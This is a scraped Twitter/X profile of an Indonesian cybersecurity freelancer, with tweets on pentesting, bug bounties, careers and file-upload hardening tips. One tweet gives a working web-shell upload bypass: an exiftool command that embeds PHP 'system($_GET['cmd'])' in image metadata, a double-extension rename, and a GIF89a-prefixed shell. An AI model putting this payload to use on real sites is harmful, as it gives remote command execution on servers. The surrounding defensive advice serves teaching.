Eno Profile
Eno

@LordEn0

1,887
Followers
303
Following
66
Media
37,245
Statuses

Joined April 2014
Don't wanna be here? Send us removal request.
@LordEn0
Eno
4 months
saya butuh kontrak
Tweet media one
872
3K
22K
@LordEn0
Eno
4 months
@GielvanDanu kurang ngopi kayanya ๐Ÿ™
5
30
2K
@LordEn0
Eno
4 months
@iqkzak mungkin jalur pendidikan Poltek SSN
13
44
2K
@LordEn0
Eno
7 months
tahun lalu iseng2 recon dns gov di 34 provinsi dan ini hasilnya ๐Ÿ˜ฆ
Tweet media one
73
336
2K
@LordEn0
Eno
4 months
@kerupukempingaj saya ikhlas lahir batin gantiin posisi dia ๐Ÿ™ amin ๐Ÿคฒ
8
7
1K
@LordEn0
Eno
4 months
@gwsudahmuak nanti kena UU pemerasan ๐Ÿคฃ
10
6
948
@LordEn0
Eno
4 months
dapat ginian bang ๐Ÿ˜ฎโ€๐Ÿ’จ buat apa coba. hadeh, pdhal bisa pesan sendiri di olshop.
Tweet media one
12
21
803
@LordEn0
Eno
4 months
@ape_mezzala osint mas
3
0
200
@LordEn0
Eno
6 months
Begitu lah kira2 seorang freelance di cybersecurity
Tweet media one
7
12
182
@LordEn0
Eno
4 months
@spacerocc malah mintah tutorial
0
0
173
@LordEn0
Eno
4 months
@shoyohchi orangnya punya title ANALYST
2
3
155
@LordEn0
Eno
5 months
Tweet media one
7
36
148
@LordEn0
Eno
4 months
terkadang ke bypass di meta data file exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg mv file.jpg file.php.jpg atau GIF89a; <? system($_GET['cmd']); # shellcode goes here ?>
@didikz
didiktrisusanto. dev
4 months
Kalo punya aplikasi web dan ada fitur upload apalagi uploadnya bisa tanpa login, hati2 harus kasih ekstra validasi semisal harus dipastikan file gambar, pdf, atau berkas tertentu. Pengalaman dulu pernah kebobolan karena ada fitur itu dan gak ada validasinya
4
6
34
1
22
103
@LordEn0
Eno
4 months
Beberapa referensi dari owasp 1. Unrestricted File Upload 2. Test Upload of Malicious Files 3. Attacking and Defending File Upload Vulnerability
@LordEn0
Eno
4 months
terkadang ke bypass di meta data file exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg mv file.jpg file.php.jpg atau GIF89a; <? system($_GET['cmd']); # shellcode goes here ?>
1
22
103
0
3
65
@LordEn0
Eno
6 months
Gampang dan mudah cukup gunakan google search engine kata kuncinya google dorks for information disclosure
Tweet media one
Tweet media two
0
6
65
@LordEn0
Eno
6 months
prnh dgr istilah 'red team' gk, guys? Jd, di dunia cybersecurity ad yg di sbt red team, tgs nya ckp ekstrim ๐Ÿฅถ. Mrk gk hnya ngetes sistem keamanan digital, tp jg tes ke org di dlm orga dgn prantara tech kek heker di film gt. Tjuan nya utk ngecek sbrapa awarenya org2 di orga
@za_ka
Ahmad Zakaria
6 months
Wah gw di PHK ๐Ÿ˜ญ๐Ÿ˜ญ
Tweet media one
650
4K
46K
8
4
55
@LordEn0
Eno
4 months
But IMHO, limiting age for tech roles isnโ€™t exactly fair. It's all about skills and staying updated, not just age. Plenty of experienced pros over 40 who can totally rock it in tech, especially in cyber security and ethical hacking fields.
@Arie_Kriting
ARIE KRITING
4 months
Untuk mengurusi hal-hal yang sifatnya berkaitan sama teknologi mungkin harus ada batasan usia sih. Gak boleh berusia lebih dari 40 tahun. Biar gak ada peluang lolos itu orang-orang uzur gaptek yang cuma suka sama jabatan dan tunjangannya saja.
610
3K
12K
2
6
52
@LordEn0
Eno
7 months
selain itu banyak yg vulnerable. ini salah satu nya
Tweet media one
1
2
42
@LordEn0
Eno
1 month
@mgilangjanuar lumayan lah buat pising A03:2021 - Insecure Design. CWE-200: Exposure of Sensitive Information to an Unauthorized Actor. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Score: 5.3 (Medium)
1
1
34
@LordEn0
Eno
4 months
Jadi haker
Tweet media one
0
2
27
@LordEn0
Eno
7 months
log exposure yg saya temukan.
1
0
27
@LordEn0
Eno
4 months
@yulyul2698 eeh iya. makasih bang
0
0
24
@LordEn0
Eno
6 months
ngeri ya bounty nya sampe ribuan dollar.
Tweet media one
5
0
18
@LordEn0
Eno
4 months
@DaengBaronang weh org barru
2
0
17
@LordEn0
Eno
12 days
Proses investigasi bocah2 nakal ๐ŸŒš
Tweet media one
Tweet media two
1
0
14
@LordEn0
Eno
7 months
@DanYamYam sangat jarang.
1
0
11
@LordEn0
Eno
6 days
Di masa depan, programming bakal jadi literacy dasar kyk ngetik atau ngerti bhs Inggris, semua org bakal bisa di level basic. Tp, skill yg spesifik kyk AI, cybersecurity, dan problem-solving tetap bakal jd specialized skill yg gk semua org bisa capai.
1
3
15
@LordEn0
Eno
7 months
@linxkaa saya juga gaptek windows tapi coba aja "sc config wuauserv start= auto"
2
0
11
@LordEn0
Eno
4 months
6. Use Secure Upload Libraries: Kalau pake framework atau library buat upload, pilih yang udah terbukti aman dan terupdate 7. Set Proper Permissions: Pastikan folder tempat nyimpen file upload punya permission, misalnya cuma bisa dibaca dan ditulis, gak bisa dieksekusi
1
1
11
@LordEn0
Eno
15 days
@ezash malvertising (malicious advertising)
0
1
11
@LordEn0
Eno
20 days
Singapura mungkin punya infrastruktur yg lebih canggih, tp urusan talent? Mrka nyari lngsng ke sini. Bisa dibilang, org2 IT Indo jadi primadona buat prusahaan2 regional. Kita punya Cybersec, developer, dan engineer yg skill-nya bisa diadu. Singapur? Mereka invest ke kita, kok ๐Ÿคญ
1
2
9
@LordEn0
Eno
10 days
Kerjaan kelar hati pun senang ๐Ÿ˜‚ tiba2 jadi soc
Tweet media one
1
0
10
@LordEn0
Eno
26 days
introvert itu jago komunikasi, tp lbh ke arah deep conversation, bkn yg basa-basi. lbh milih untk ngomong yg meaningful, drdp ngobrolin hal" yg mgkn bikin capek atau awkward. bkn gk bisa bersosialisasi, cma prefer ngobrol yg lbh berisi dan lgsung ke poinnya. Km ngerti kan?
2
1
9
@LordEn0
Eno
10 days
Im a researcher right now
Tweet media one
1
0
9
@LordEn0
Eno
5 months
Tweet media one
0
0
7
@LordEn0
Eno
4 months
Udah di verified sama yg punya poto @annashrbn ๐Ÿ˜Œ
Tweet media one
1
0
7
@LordEn0
Eno
13 days
Assalamualaikum
@sekurlsa_pw
๐Ÿ•ณ
15 days
PoC and wirte-up for CVE-2024-38200: Microsoft Office NTLMv2 Disclosure Vulnerability Patch:
2
46
172
1
0
7
@LordEn0
Eno
4 months
Pwned on May 22nd, 2022
Tweet media one
0
0
7
@LordEn0
Eno
4 months
Hindarin file upload vulnerability buat keamanan. beberapa tips simple: 1. Filter File Types: Terima cuma file dengan tipe tertentu aja, misalnya .jpg, .png, .pdf, dll. Jangan biarin file executable kayak .exe atau .php masuk.
1
2
7
@LordEn0
Eno
4 months
@DaengBaronang makassar :v
2
0
5
@LordEn0
Eno
1 month
Sometimes, itโ€™s not the world around you that needs to change, but how you look at it. The real challenge isnโ€™t how heavy the load is, but how determined you are to keep moving forward.
2
1
5
@LordEn0
Eno
12 days
Akun sebelah ku di follow orang ini njir๐Ÿ—ฟ
Tweet media one
0
0
5
@LordEn0
Eno
25 days
@sisikirimu kayak 25
0
0
4
@LordEn0
Eno
4 months
4. Store Outside Web Root: Simpan file di luar direktori root web biar gak bisa diakses langsung lewat URL. 5. Validate File Content: Selain ngecek ekstensi, cek juga isi file. Misalnya, pastiin file image beneran image, bukan script yang disamarkan.
1
2
4
@LordEn0
Eno
2 months
@excalilburn wkwk tiba2 jadi network security, developer, SEO eeh jadi perawat pula dia
Tweet media one
2
0
4
@LordEn0
Eno
9 days
Green Card Lottery, atau yg dikenal sebagai Diversity Visa (DV) Lottery, adlh program tahunan yg dijalankan oleh pemerintah US untuk memberikan kesempatan kpd org2 di negara dgn tingkat imigrasi rendah agar bisa mendapatkan permanent residency (Green Card).
0
0
4
@LordEn0
Eno
12 days
@langleuykap Bahkan yg pake debian pun baca nya archwiki. yg penting systemnya masih systemd
1
0
4
@LordEn0
Eno
7 months
@acilaldilah kumpulan situs slot gacor terpercaya
1
0
3
@LordEn0
Eno
6 months
@cync48 ada tapi ngk gratis sih mas bootcamp nya di studi DevSecOps Indonesia ( Penetration Tester, DevSevOps Engineer sama SOC Analyst L1 )
0
0
3
@LordEn0
Eno
6 months
@linxkaa karena kamu sering pap
1
0
3
@LordEn0
Eno
11 days
@langleuykap Baca ebook C|EH atau OWASP trus practice lab yg lebih ke pentest bisa ke Portswigger, Tryhackme -> Hackthebox termasuk CTF Jeopardy kayak Crypto, Pwn, Rev Engineering
1
0
3
@LordEn0
Eno
7 months
@madewithsperm gk ada. penting jadi
1
0
2
@LordEn0
Eno
27 days
Bang di LinkedIn kan platformnya profesional. kalau udah nanya atau ambil insight dari orang lain, apalagi di komunitas, kasih credit tag dong! Gak cuma sekadar etika, tapi juga buat menghargai kontribusi orang.
0
0
3
@LordEn0
Eno
7 months
@buangyulianto bersihin dns record cname
1
0
2
@LordEn0
Eno
10 days
@kiri_pak Kurang org dalam
0
0
2
@LordEn0
Eno
6 months
@ammanah Haha, iya banget! Kerjaannya gk cuma ngurusin bug, tapi juga nge-handle security, compliance & automation. Jadi ngubah requirement itu kayak ngebongkar lagi satu persatu puzzle yg udah rapi.
0
0
2
@LordEn0
Eno
1 month
@teeraruri Halo. belum bisa opn mic hehe
1
0
2
@LordEn0
Eno
4 months
2. Rename Files: Pas upload, ganti nama file jadi unik biar gak bisa ditebak. Contohnya tambahin timestamp atau random string di nama filenya. 3. Limit File Size: Batasi ukuran file yang bisa di-upload. Ini juga ngebantu ngehindarin serangan DDoS.
1
1
2
@LordEn0
Eno
1 year
@LinkedInHelp Hello @LinkedIn team, Thank you for responding to my tweet, please @LinkedInHelp check DM replies. I have attached LinkedIn account email in the DM replay. Thanks. Eno Leriand
7
1
1
@LordEn0
Eno
1 month
@algonacci bisa juga pake uname+1 @gmail .com
0
0
2
@LordEn0
Eno
8 days
The Adam and Eve Story bahas teori kalau Bumi mengalami cataclysm besar scr berkala, salah satunya banjir besar yang dikenal dalam kisah Nuh. Thomas menyebut ada peradaban kuno yang jauh lebih maju dari kita, tapi hancur karena bencana alam yg terjadi setiap beberapa ribu tahun.
1
0
2
@LordEn0
Eno
7 months
reverse Rust binary
Tweet media one
0
0
2
@LordEn0
Eno
6 months
@AquaReqia Mgkn lbh ke arah VA sih dripda Governance, Risk, & Compliance. GRC lbh ke risk management & regulatory compliance, smntr red team lbh fks ke test & security evaluation scr practical. Jd lbh ke hal teknis drpda prses risk management scr keseluruhan. tp balik lg ke paket nya hehe
0
0
2
@LordEn0
Eno
5 days
Cuma bisa copas hash ke virustotal jadilah malware analyst. kelar sudah tugas task 1 ๐Ÿ—ฟ nah unlocked new skill copy paste hash and analysis
Tweet media one
@LordEn0
Eno
5 days
Kemarin lagi gabut di LinkedIn liat postingan org penuh drama bikin ngantuk. Iseng buka fitur job ketemu perusahaan luar yg fokusnya antivirus. Update lah CV yg cuma ganti nama file doang lalu apply sebagai Malware Analyst krna hanya itu yg open. Eh tiba-tiba test. Bjir๐Ÿ—ฟ
Tweet media one
0
0
6
3
0
12
@LordEn0
Eno
4 months
Tweet media one
0
1
2
@LordEn0
Eno
3 months
@imrenagi Secure Coding Practices, Authentication and Authorization, Secure Configuration Management, Logging and Monitoring, Secure Software Development Lifecycle (SDLC), Secure API Design.
1
0
2
@LordEn0
Eno
11 days
@langleuykap Bootcamp? saya juga gk bs kasih rekomendasi bootcamp apa pun karna terkdang gk sesuai ekspektasi. bidang ini lebih byk yg otodidak sih yg awalnya krna suka ngoprek haha rasa penasaran nya lbh ke "apa yg terjadi di belakang sana"
1
0
2
@LordEn0
Eno
6 months
@jxxxhxxn tegas ya. tipikal calon mertua idaman
0
0
2
@LordEn0
Eno
5 days
Assalamualaikum gantengkuh. Berikut Info tdk penting untuk kawan-kawan kuh yg literasi nya kurang baik. Semoga bermanfaat. Thanks
@gf_256
cts ๐ŸŒธ๐Ÿณ๏ธโ€โšง๏ธ
5 days
Just received the scariest email ever. But it turned out to be phishing. It was very well written and looked almost exactly the same as the real deal. Stay safe! Now is also a great time to review SEAL's wonderful Twitter self-audit checklist: (linked below)
Tweet media one
14
48
346
0
1
4
@LordEn0
Eno
9 days
Tweet media one
0
0
2
@LordEn0
Eno
7 days
0
0
2
@LordEn0
Eno
11 days
@langleuykap Ohiya. Root-Me atau OverTheWire buat sharpening skill di network atau exploit basic, PentesterLab atau RangeForce jg bgs buat hands-on experience. Pokoknya byk lah haha. tools? sejujurnya gk bs ksh saran. intinya rajin baca writeup krna terkadang setiap case beda tools
1
0
2
@LordEn0
Eno
2 months
@rhmi_fii diawal2 tetap dicek. bkn krn gak percaya, tp biar standar kualitas tetap terjaga dan dpt feedback buat improve. Stlah udah lancar, baru dilepas. Tetap ada review periodik sih, buat jaga2.
1
0
2
@LordEn0
Eno
2 months
@imanuelr10 @nikkoep improper error handling ??
1
0
1
@LordEn0
Eno
8 days
dikatain atheist karena nongkrong sama komunitasnya pdhal saya hanya tertarik sama pembahasan mereka tentang alam semesta mulai dari tercipta hingga terjadinya kehancuran bumi dan manusia terlahir kembali sebagai peradaban baru๐Ÿ—ฟ
2
0
1
@LordEn0
Eno
2 months
@ZakiNadhiff selan itu Arch Wiki juga selalu jadi referensi problem solve. intinya pilih distro yg punya dokumentasi lengkap.
1
0
1
@LordEn0
Eno
7 months
@musuhphp emang bisa ya ?
1
0
1